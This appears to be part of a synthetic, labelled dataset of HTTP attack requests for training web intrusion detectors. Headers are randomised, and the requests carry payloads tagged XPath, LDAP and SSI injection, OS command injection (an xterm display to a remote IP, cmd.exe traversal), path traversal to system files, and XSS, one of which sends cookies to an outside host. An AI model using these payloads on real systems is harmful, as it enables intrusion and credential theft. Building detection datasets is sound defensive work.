Proxy-Authorization: Digest nonce
Authorization: Digest nc=E29dD4a9
Range: 69-,-199
Referer: http://qhrrrs.ch/8kfmtb0/ahd4tewi.pl
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 6.7; ls-uk; rv:4.7.9) Gecko/45780089
UA-CPU: Sparc
Via: p8r9/1.1 www.arnp.gif
Transfer-Encoding: matero
Upgrade: ohn/4.2
Warning: 265 157.39.223.179 "hiCm" 
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36874
Start - Id: 49850
class: XPathInjection
GET /R-9VCo7e/ttdesttluast1pNhhMe/ahxuGwm7/srFieb0so/oosasyn0pHr/no/rXBqgUwWX7zJIGED3Z/aJN/tXrzkXbQ1w8TH66T/pK.dTD4.jpeg?6amanne3=i-cfxrwr%3Encss8+a+%3Fli&dabrhK=8628001343&iy=tlehndtt0nikaISper&AtmpU2mochashutdown=621++++or++tz%2Foa%2Fagn2rt%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D8%5D+++or++++6403%3D&nSp7ca9hdt=9&ceeLufshnts=exRiIU17eH9N&qdUhz-himgLX=0e95 HTTP/1.1
Host: www.oiireZdna.fr
Connection: em6bm
Accept: text/plain;q=0.3
Accept-Charset: windows-1253, x-mac-ce, cp-936, iso-8859-15;q=0.1, hz-gb-2312
Accept-Encoding: compress, gzip;q=0.1, identity
Accept-Language: *
Cache-Control: max-stale=00
Client-ip: 236.200.66.115
Cookie: ims=rtt? )liobraccE;tgrlEhhraelhle=73810642;urepdetoemb5rie=tt=em
Cookie2: $Version="7"
Date: Tue, 20 May 08 04:18:46 CET
ETag: W/"Xx8JR4V4r-QIlXyJ"
Expect: niuaoet
From: ohlydam@WdehaAi.biz
If-Modified-Since: Mon, 22 Aug 05 16:28:36 UTC
If-Unmodified-Since: Wed, 30 Dec 09 21:28:58 UTC
If-Match: "PU_DlUXrgu.Bkj.f"
If-None-Match: "Q2f3jnzcL__YweJPvAI"
If-Range: *
Max-Forwards: 729
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: i0phE o2nl=eewznpi
Range: 98475-041,374-
Referer: /qstoeeu.mdb
TE: gzip
Trailer: If-Modified-Since
User-Agent: iebnfKse
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 967x245
Via: FTP/0.7 140.133.133.58
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 56.172.198.103
X-Serial-Number: 6075380404911977
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49850
Start - Id: 43556
class: OsCommanding
GET /Aheg3vigesnaol/vDfZRwmLtMpZoib7WU4/varaCRVIMAd/NE90B/axXKlOU39uyG_7/wityatrHndumcAth/yEOhIrRoanssata.mspx?8t0dFLXN3X=%5Cr++++xterm++++-display+++93.4.216.75%3A0.0 HTTP/1.1
Host: 131.125.115.163
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: n-l97atuen
Cache-Control: max-stale
Client-ip: 214.70.1.175
Cookie: eTTanstng=n<lasi5re8;onWhnr=941;gke0=opt;I4Ld0avChttpkuv=r 7]fiphp lP;nllc=oreplacen
Cookie2: $Version="88"
Date: Fri, 05 May 06 14:20:54 GMT
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Sat, 15 Apr 06 20:11:34 UTC
If-Unmodified-Since: Sun, 20 Apr 08 06:36:28 GMT
If-Match: "OocUsqj8sAMR@yi"
If-None-Match: *
If-Range: "CT8FV.6p_EE5..7"
Max-Forwards: 0
MIME-Version: 7.0
Pragma: rAnto=0nFwwre
Proxy-Authorization: NTLM YmxvNHRwYW5pdHhhdTNhaGhpY3R0ZGg5c2luUm5kczVlZElzYWE=
Authorization: Digest uri=http://mtadsp.fr/itaM/gsambnr/mo4year.pl
Range: -25100,-2
Referer: /15gko/estause/t5nl/Apurp.mspx
TE: chunked;q=0.5,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.1 (Windows; U; Win98 1.1; hl-te; rv:6.3.2) Gecko/77547683
UA-CPU: x86
UA-Disp: 484,9177,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: 5.4 www.intzd.htm, FTP/3.0 www.ezhzeltb.htm
Transfer-Encoding: identity
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 36797879465846791
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43556
Start - Id: 47971
class: XSS
GET /tnW3eoe/one8ua/3eR5RRD.asp?gZiframe_6l-httpsGD=arR&emzipsE=%3Cdiv+++style+%3D+++%22++++binding%3A++url%28%5Bhttp%3A%2F%2Fwww.tr.com%2Fscript%2F9lnL4.cgi%5D%29%3B++%22++++%3E&eerlhjh=ilh0&rhifsQt=rf+Ah&gsoajheeaeatt=97&nn3ote3ctu=or%2FDbgsound&eahsi9ddesxm=yrttkiew6a&kdnlaEEieiOxa=tsb%3Dt4sMhLIhoitehttpss&tea87e=7454114 HTTP/1.0
Host: www.nwunuonEtr.st:12
Connection: keep-alive
Accept: image/*, text/*, image/*;q=0.0
Accept-Charset: iso-8859-3;q=0.5, x-mac-hebrew;q=0.5, x-mac-icelandic
Accept-Encoding: 
Accept-Language: M-nd9auai;q=0.2, Net-itehIeta;q=0.7, af-in;q=0.5, rltt-a
Cache-Control: no-cache
Client-ip: 8.102.174.32
Cookie: mY0home= e 7'
Cookie2: $Version="1"
Date: Sat, 27 Dec 08 21:38:48 GMT
ETag: W/"YuclQnAaadN.hM_u"
Expect: 100-continue
From: etro@rlateera.gov
If-Modified-Since: Sat, 27 Mar 04 24:47:05 CET
If-Unmodified-Since: Tue, 10 Apr 07 07:30:45 GMT
If-Match: *
If-None-Match: "_W4WYoRD8ccimjR7xW2z"
If-Range: "iLsJkKHEd0IJuiUtYMh"
Max-Forwards: 8
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: cdaead o0tyni=dtuinus
Authorization: Basic ZDBJMzQ0czpCdW90
Range: -3122,1126-
Referer: /yhuvaN/le3doa.sh
TE: chunked
Trailer: User-Agent
User-Agent: Mozilla/2.4 (compatible; MSIE 7.6; Linux i386; Unponp1)
UA-CPU: 68000
UA-Disp: 305,820,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 480x167
Via: HTTP/9.6 www.g2ot.js, 0.4 www.d9si.tiff, Ilutln/4.5 www.lensTo.shtml
Transfer-Encoding: gzip
Upgrade: eat/7.3, imnF/6.2, 5tcs/7.4
Warning: 319 www.lcdiYive.shtml "isuriaeymsr" "Mon, 25 Jul 05 15:24:43 GMT"
X-Forwarded-For: 31.111.134.242
X-Serial-Number: 41529
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47971
Start - Id: 44273
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 126.249.158.129
Connection: close
Accept: audio/basic, text/html, text/*;q=0.6
Accept-Charset: x-mac-icelandic;q=0.6, windows-1254, x-mac-arabic;q=0.9, x-mac-chinesetrad;q=0.2, x-mac-chinesetrad;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: yGsoG1=saTorV
Client-ip: 208.204.2.15
Cookie: uLpoygenej=703;shhnptnx=72;xsL8m5tqstw=ieutdn4ideaFcbb;6oNHcmd=117
Cookie2: $Version="544"
Date: Sat, 26 Jan 08 15:23:34 GMT
ETag: W/"JQx0uHTwXQsPyN32k.C"
Expect: 100-continue
From: iefdsb@2Nyh.org
If-Modified-Since: Wed, 07 Oct 09 09:10:23 GMT
If-Unmodified-Since: Wed, 27 Feb 08 06:28:43 CET
If-Match: *
If-None-Match: "F6tOg9hoGZGSklci"
If-Range: "9WdYEZ8WD_c65R2@Y"
Max-Forwards: 276
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM VGxycmhjbG53cjdsc0Z0aWVuaGl0bmVib2lhZWk3U2ljYXZ4bnNpb2JybG0=
Authorization: ut2ox dtgbj=visno
Range: 1630-9,-816
Referer: http://www.otbettoo.fr/twir/etar/teola/e6mhn9/neSor.asp
TE: trailers
Trailer: User-Agent
User-Agent: mOeVLbL http://www.inrli.it
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7064x6561
Via: 3.7 18.162.215.2, tNl/9.7 www.Htal.htm:9
Transfer-Encoding: identity
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 232.32.37.138
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44273
Start - Id: 39791
class: SSI
GET /dee3/Obfxxp_G5m2/uetor.pl?odm7nndOeToi=nEme%26c&lQAS83k3samGIr=dotka14aamo&AVXstdinbE=nsnssnbmsharoT9ak&4aN8id2nCd=%3C%21--++++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&RHAj.um=354923&tehiot=%3Dkbieii%2Fmetaupdaters&smh=%3FmiItoh8dtonze HTTP/1.0
Host: 108.208.196.125:423
Connection: keep-alive
Accept: application/rtf;q=0.4, image/jpeg;q=0.3
Accept-Charset: euc-tw, iso-8859-5
Accept-Encoding: 
Accept-Language: eioeatw-mepyoidh;q=0.0, d2r-o;q=0.0
Cache-Control: max-stale=9410
Client-ip: 129.26.179.125
Cookie: me=hnhitaaaselect;heneiia7tatbial=ns@YYrNu;nr=4404926;xik=o2GvR0c3pPxH;sznrreiahho=0dlEr
Cookie2: $Version="9"
Date: Mon, 27 Nov 06 09:48:13 GMT
ETag: W/"Ne7FULYkvbu.-BWNg_8"
Expect: 100-continue
From: otit3le@ijlhneot1o.com
If-Modified-Since: Thu, 13 Oct 05 15:21:31 UTC
If-Unmodified-Since: Sat, 25 Apr 09 15:44:44 GMT
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: "QkGjakNT_idqLCD_P@U"
If-Range: Mon, 14 Feb 05 17:45:30 UTC
Max-Forwards: 0174
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: Basic aEV2aWVjbzU6bDgyZW9JYQ==
Range: 538-81062,0-593619
Referer: http://5ifKedah.org/tcmcnoa7.mdb
TE: gzip;q=0.7,trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/6.7 (Windows; U; WinNT 7.7; tM-do; rv:9.4.3) Gecko/82817511
UA-CPU: Sparc
UA-Pixels: 181x202
Via: FTP/5.9 www.snhelRO2.css, 6.3 www.amdrli.shtml, HTTP/3.4 105.227.173.161
Transfer-Encoding: deflate
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39791
Start - Id: 45606
class: PathTransversal
GET /sac/wmgpa8_/1Jb_iXh/Ezoi6sg0iv/6hEocUOYvIIR5/rETbrlM/m@c4QtD6LEmnw3Bo3y/tvmL4t83S.pqG/TbzinsertD0Q/9i29womzeio.tiff?zh=ge+n%27d%3F&No0wze2b=..........................WINNTsystem.ini&cecnqgtm7Oswme=connectuEeh4au&rtdUg0oaru8=mI2 HTTP/1.1
Host: www.76torw4.be
Connection: aYo6
Accept: application/x-tar;q=0.2, video/mpeg;q=0.6
Accept-Charset: x-mac-turkish
Accept-Encoding: *
Accept-Language: 0Iobshh-nl1, if6bmiG8-nai, ioahto-tra, lnel-eetEerOa, rtiOibrt-pl9pMmt;q=0.6
Cache-Control: max-age=84594
Client-ip: 145.209.224.15
Cookie: y1huoy=4ErihiT
Cookie2: $Version="71"
Date: Thu, 27 Aug 09 11:44:52 UTC
ETag: "1uZHYBpjmXTTQQw"
Expect: esyo=tri8;dewo=I4XpUye
From: f4re3ea2@HiNl.uk
If-Modified-Since: Sun, 22 Jan 06 07:30:39 GMT
If-Unmodified-Since: Wed, 01 Mar 06 19:29:14 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Sep 08 01:32:14 CET
Max-Forwards: 07
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: NTLM ZG5mQmVwaGFqdHN3M2g3d1JwdGQzMGkzaG1FSWNubU5vdWlzZXRpY2VhdHVz
Range: 942-,71595-5
Referer: /8kTItre/qngtco/npgzt/dexe4.bin
TE: deflate;q=0.5,trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/2.9 (Windows; U; WinNT 4.4; dt-ta; rv:0.4.0) Gecko/06899075
UA-CPU: MIPS
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 413x730
Via: 9.3 www.amin.css
Transfer-Encoding: compress
Upgrade: lsf/8.1, rxeP4b/0.5, dc3n5/4.8
Warning: 158 www.Ttdiei.css:7666 "nmlzcnl1" 
X-Forwarded-For: 228.147.206.124
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45606
Start - Id: 36971
class: LdapInjection
GET /m6i/aNreen/oiMdW1witter/ho4mnTrneft5ggletyy/O0_wcat6pHNbvlmeta.asmx?rvrhwi1AsgijC=mlele&utdly=936169839&YULvAY1tg=qe%29%28++%7C+++%28hdl3%3D*%29&kXv6R-stf=7an&HlinednmbaluT=oE4R HTTP/1.1
Host: www.saoaoxyes.it
Connection: gdyn
Accept: audio/*;q=0.4, video/*
Accept-Charset: iso-8859-5, windows-1250;q=0.1, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: s9t-tpvw0o, whlto0t-e;q=0.0, dasitDf-iEt
Cache-Control: max-stale=013
Client-ip: 248.80.57.117
Cookie: tF-viLcUWf-=eabrxiict2system;aacvtaepxfwmihA= 
Cookie2: $Version="599"
Date: Sat, 31 Dec 05 09:52:19 CET
ETag: W/"kRj_Ud1No8MgV-PGN5a"
Expect: 100-continue
From: fipt@jjMrleib1.biz
If-Modified-Since: Sat, 27 May 06 05:43:22 UTC
If-Unmodified-Since: Mon, 15 May 06 10:42:22 GMT
If-Match: *
If-None-Match: "b81RCllo4JeISay"
If-Range: Tue, 27 Apr 04 15:44:31 CET
Max-Forwards: 527
MIME-Version: 8.6
Pragma: lno13wco='ceet'
Proxy-Authorization: Basic ZU5vazphdXBp
Authorization: NTLM ZXBuYXRUNW9zamhlbk50cGN5ZWdSOGtOYW9laGR3VWV1Z2FPcTBi
Range: 84-,-422477,1197-5319
Referer: http://wdcs7osi.ch/s7rtfw/Sssa10s/c8osjee/lnbNrmNn.gif
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: Mozilla/5.1 (Machintosh; U; Mac OS X 2.1; mz-ei; rv:3.2.4) Gecko/93686611
UA-CPU: StrongARM
UA-Disp: 553,0581,32
UA-Pixels: 654x7541
Transfer-Encoding: compress
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Serial-Number: 4593021783716355
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36971
Start - Id: 46759
class: XSS
POST /hnDsghon9lhm6t0oppig/wQ9DDbBnZ9iiX8rW/HoeAu-jyL9/saiesqa0Ps6h7s/viZMe3R/yZkVtrfmm6SY5Q/orv/trh3lraanahJsoiaNtRg/hJbDgmXYy7l658_u/oo9ki6aw7osni/bjkuuo5_xMRN8QUnFe/iHm7DEQLa68.css? HTTP/1.1
Content-Length: 247
Content-Language: Luniiip
Content-Encoding: deflate
Content-Location: /ssxnoei/cRylSlt/tOjeit/e0Snazcd.msf
Content-MD5: aWViZXRHdFRlQTNoczE4OQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 17 Sep 08 07:52:59 GMT
Host: www.nthweeC.de
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip
Accept-Language: *
Expect: tnqid
If-Unmodified-Since: Fri, 05 Nov 04 19:16:57 CET
If-Match: *
If-None-Match: "0JOV5Sq0YhXw@SSpO2KI"
If-Range: Wed, 18 Oct 06 02:10:26 GMT
Pragma: no-cache
Referer: http://w2toa1.it/uty0/minn/exi0otmn.mdb
TE: trailers
User-Agent: Mozilla/5.3 (compatible; MSIE 0.7; Win98; wotmRdl)
UA-Color: color8

njgdahtc1nr=8NzLIHU@jl&Dtv_Q=SeoqanyhSs&Itmp_eeQ=yu&eeysbsq=<div style  ="  background-image: url(javascript:    [window.open('http://198.65.119.66/trelll.aspx'+document.cookie);]);   "   >&es=rzo8;4

End - Id: 46759
Start - Id: 38707
class: LdapInjection
GET /eioe.aspx?oydalgM3=%29%28++%7C+%28++cn%3D*o+++%27brien*++++%29%28mail+%3D*o+++%27brien*%29++&2OHE_=amocha&eriowtyusnbln4s=tSPTa6p&1yecenoeelhw35=6173555&8QscriptlkQ=owerthlicnonr&rh=vBfYgQ7Pzjz&4sCGmsJMh1mocha.=e%3Aawno%7Eftp%405%25uysi++oPd&chmp9to=e%2Bni+%2Fh7xcom%40%27%40&fiecsctidct=ggop2Ro7jMMM HTTP/1.0
Host: 148.181.201.103
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale=52
Client-ip: 244.26.7.222
Cookie: t0tnLsaatul=rA9FQ-xW_
Cookie2: $Version="4"
Date: Wed, 19 Aug 09 16:35:27 GMT
ETag: "W_VEAUp25OqZ2HNn5Hk"
Expect: rsracoa
From: ilrb@h5ihiwr.cz
If-Modified-Since: Fri, 01 Jun 07 06:38:43 UTC
If-Unmodified-Since: Sat, 18 Feb 06 20:47:00 CET
If-Match: "98Fjs4vs5yXbPmVy"
If-None-Match: "0pxAnPtJkDnriZ4S3OB"
If-Range: Thu, 31 Aug 06 09:08:23 UTC
Max-Forwards: 0063
MIME-Version: 6.8
Pragma: pW=rwsr
Proxy-Authorization: e7fkmh dlnen=ue3t2
Authorization: NTLM dG5zUG5ycmlhdGl3ZW1scnR0Z3RoZXRyb2tqbGVEdGhhdHRlZTA3aVRyZXBFcjk=
Range: 557810-
Referer: /eton9llE/pxms.js
TE: trailers
Trailer: If-Modified-Since
User-Agent: eotcs/7.6.1
UA-CPU: PowerPC
UA-Disp: 849,080,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: FTP/7.0 www.zoon.css
Transfer-Encoding: compress
Upgrade: xorad/3.4, wEIe/7.5, ten/7.9, acen/0.3
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 2036452883987
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38707
Start - Id: 38217
class: LdapInjection
GET /oXZ.9ufzgHxNthvr7/m6zjN91gOf/n3prm2vceerr1rmjH/phy-28YM595cToqlkE/1r.b/tHnyayideemh/tu/apesikasAn4kcyneioo/melmiochqotqt/s.-saRFHsXXk-h2Lf/oGRGko/fW5W-UF5.nsf?nph-R4SD=abwg+%24+aOpi+trmDe&oednoao5as4ceO=s%24ta%5BkubelhfdetlNescripto&eetvetntttef6d=pWxH1A1&sfn9sIMesloheo=Beiue&l36lIo=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 120.178.31.128
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: ks_c_5601-1987, isiri-3342;q=0.5
Accept-Encoding: 
Accept-Language: Noei2-incab, th0i-lh, rl81p-anvlhn;q=0.2, rsth-e
Cache-Control: only-if-cached
Client-ip: 9.211.101.123
Cookie: e98uhsscasq=2;stzdBEd=oHmdaBlie;I4J9K3MTD7wE=pQjK817o-jPE;7yrZbistPm=ne5;positionjvH_2mrcptelnet8vc=wRoUqcx
Cookie2: $Version="88"
Date: Thu, 30 Dec 04 01:54:24 GMT
ETag: "HeHqGgYUuhkexda"
Expect: frgofie
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Sat, 31 Jul 04 13:58:58 GMT
If-Unmodified-Since: Tue, 05 Jan 10 08:12:00 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Feb 05 23:10:28 CET
Max-Forwards: 4667
MIME-Version: 3.2
Pragma: evt='g'
Proxy-Authorization: fenea desahf1=7eTtla
Authorization: ctrzcs hsinri7h=iwlxonir
Range: -921
Referer: http://www.creetei.net/ewtMod/i0fth.tiff
TE: trailers
Trailer: If-None-Match
User-Agent: 34HI8sM http://www.uxatw.fr
UA-CPU: 68000
UA-Disp: 912,7281,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 321x2267
Via: wqe/9.4 www.rmjrdelL.html:8
Transfer-Encoding: deflate
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38217
Start - Id: 45075
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: www.srN9m1.uk
Connection: ervaudo
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 101.182.197.221
Cookie: Tz6WyA=rt3oaasosg9;eeet5=y)xfieinput]Ot ;kTus8uc=u'%ul\4scriptetmpm echoe;pyijGigo0at=7154644;agYV53x6qkFu=g8khsiah4oNrua0tdh
Cookie2: $Version="785"
Date: Wed, 12 Jan 05 16:31:13 UTC
ETag: "0GbJoMCi@JTjqEsBGN"
Expect: 100-continue
From: 8gV2@oyweendsp.ch
If-Modified-Since: Mon, 14 Nov 05 03:21:58 GMT
If-Unmodified-Since: Tue, 14 Apr 09 19:07:45 UTC
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: "g_CaWiatmA1dIm1t_i0M"
If-Range: Thu, 12 Feb 09 04:56:57 CET
Max-Forwards: 4882
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: NTLM bnJuemVma25tY3JTcm5abm1lb3RoYXRlbm5pZm9yb25sMkU=
Range: 51016-,-10087
Referer: /dttttfKa.wmn
TE: chunked
Trailer: Range
User-Agent: u6o6ed
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 088x7672
Via: 4tir/0.7 145.186.87.107:331
Transfer-Encoding: compress
Upgrade: nadi/5.9, zccv3/4.5, 3E2ei/5.6
Warning: 634 220.181.199.153 "EI6etnt" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 2196102
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45075
Start - Id: 42950
class: OsCommanding
GET /ienkjideo/nemvWTP6phv7AVN_D-0T/q8logST/eneeawn/mgk.m35xwI.aspx?EZIXCfOI=cemlebtsc&fnetrnfeaL3is=5&yvhtaccesRstyle2Dx=oTv&bw2e5nisfo9O6=91981321&irau=8seweetra0%3C6to3a&FBmoVscriptdBMy.7=283708&ojmu=f3window.openeha+t&env=naae HTTP/1.1
Host: www.lsM5r.be
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-ce, iso-8859-2, iso-8859-1;q=0.2
Accept-Encoding: |  ps  -auxwww   ;
Accept-Language: 9tibgda-OohngA;q=0.6, h-o;q=0.3, nemee-Sfq;q=0.3, ths7se-one, r-csneeb
Cache-Control: no-transform
Client-ip: 152.219.121.215
Cookie: Ie1PQVPew=2i;gmhahybgeiaaho=26486952;stee=lOmochae;nn=tS@vm8
Cookie2: $Version="64"
Date: Mon, 14 Aug 06 23:37:12 UTC
ETag: W/".mti5B@ymIz3s@wO9Zf"
Expect: inh0DlrX=lskoe
If-Unmodified-Since: Tue, 29 Jan 08 01:11:05 UTC
If-Match: "G2oMMLSZxlBO2duWTm"
If-None-Match: *
If-Range: *
Authorization: Basic aW80ZWNjSHM6N3dleHhlbk0=
Referer: http://www.urrfdt.com/6cs0swE.sh
TE: trailers
User-Agent: zu6MVT http://www.ek8e.org
Via: 0.9 www.nironinl.css
Transfer-Encoding: gzip
Upgrade: c3risi/6.3

null

End - Id: 42950
Start - Id: 45842
class: PathTransversal
GET /bAibnre/njasit5Ldo/fnswtssftcxwAi0A/aaxe1d0nrtmM7grs/qoMXdw6M3BNN/sV/fNre/3ngmbwEH@cJs1/oeEsohdWzoiehnoaTeU/uMS0p/.ehH-_VUnSphpselect/irahu.shtml?tesrSsit1xw9thA=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.0
Host: 58.180.201.94
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: E='r8'
Client-ip: 145.76.47.201
Cookie: staop=3837;Ah8ecbiweT=Ge81spyascdA;0Edd=nb;ENHI1ds8=9;ADpassthrukYuF=25;8WheBY=t@mmHBNRXz
Cookie2: $Version="59"
Date: Fri, 19 May 06 14:36:21 GMT
ETag: "w2vPLptRFBMbnkB@"
Expect: crmd2me
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Mon, 11 Feb 08 23:45:56 UTC
If-Unmodified-Since: Thu, 27 Jul 06 01:27:02 CET
If-Match: *
If-None-Match: "zXW-D.D90nzMt8qQ"
If-Range: *
Max-Forwards: 8135
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Digest realm
Range: 248-
Referer: /87G4tcw4/aeden/Atllrq/trluoea/d01u.tiff
TE: gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: glncLspoa (s.xWqc; qODD2Io; fRO80sozAc; tOMYWkssS_)
UA-CPU: Sparc
UA-Disp: 7854,570,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 271x8605
Via: FTP/7.6 www.eiohilm.jpeg, FTP/5.3 147.230.170.29
Transfer-Encoding: compress
Upgrade: inw5/1.5, wwesr/8.9, 5rte/1.6, d8hhli/8.3
Warning: 146 143.244.193.232 "tjezxosaoyuieeityv" 
X-Serial-Number: 25397478987579
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45842
Start - Id: 49197
class: XPathInjection
GET /nndayeaifhsyeiOiiCs/DFTA/ef@p5xyVAWH/nuFeolraoepxh/sG29FE1wy96/g0trnfneDp5ceft/nHOu8sMoHWmm/ufbrgenae/aoUo/BGTX4T6allFLc8Cz/connecthv/igotn.jsp?.NbNKQ=b47e&554atZir=6373402&nmTjenUdst9swA8=ecx4&ab0aret4Enfs=qreplaceeippoots&elEsutte5tdsao=134324100&e5tli=293258&nSh9hph1ata=llmo+&ttardpnckaLnno=oj8&geed=3o%3Bp+oznifegd+&6aAlp7oaa26ern=12121+++or++ienos%2FSm%2Fn%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D84%5D+++++or+++75%3D&saOsi=660&coaMgk9au7e1=590&NuhEw=96900091&oxsroio4bpa=61&fu4Metcku0FlU=+ea HTTP/1.1
Host: 225.65.148.125:04
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-greek;q=0.8, windows-1258, iso-8859-5;q=0.5, windows-1255
Accept-Encoding: identity;q=0.7, compress;q=0.1, identity, gzip, compress;q=0.0
Accept-Language: *;q=0.5
Cache-Control: fu='tu1nzsrw'
Client-ip: 254.208.202.91
Cookie: jw1sHSNchild=st;rdkde=iy;rwteh1aeuen=mror;JhtpassPD=nSelreemorcanrptSn
Cookie2: $Version="0"
Date: Thu, 28 Aug 08 12:41:29 GMT
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: wlenof
From: Gswzt6t2@seem.gov
If-Modified-Since: Fri, 30 Jan 09 24:50:27 GMT
If-Unmodified-Since: Thu, 18 Nov 04 17:37:49 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 6179
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM c2FoaU9qc3RsdG9uY2VodDg3a2Z4U3NsYWJpaWVhNTZ0bmVzb2g=
Authorization: Basic aFNhZWllRXI6ZWtyVGxsYWk=
Range: 943272-69165,-532,868-6
Referer: http://dweGn.cz/9p2ctaff/he4geA/mislli/frotis.fgf
TE: gzip;q=0.4,trailers
Trailer: If-Match
User-Agent: h9AypRDY7 http://www.eolxv.de
UA-CPU: MIPS
UA-Disp: 344,403,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 3.0 164.15.193.254:1147, FTP/2.8 www.cme8.jpeg
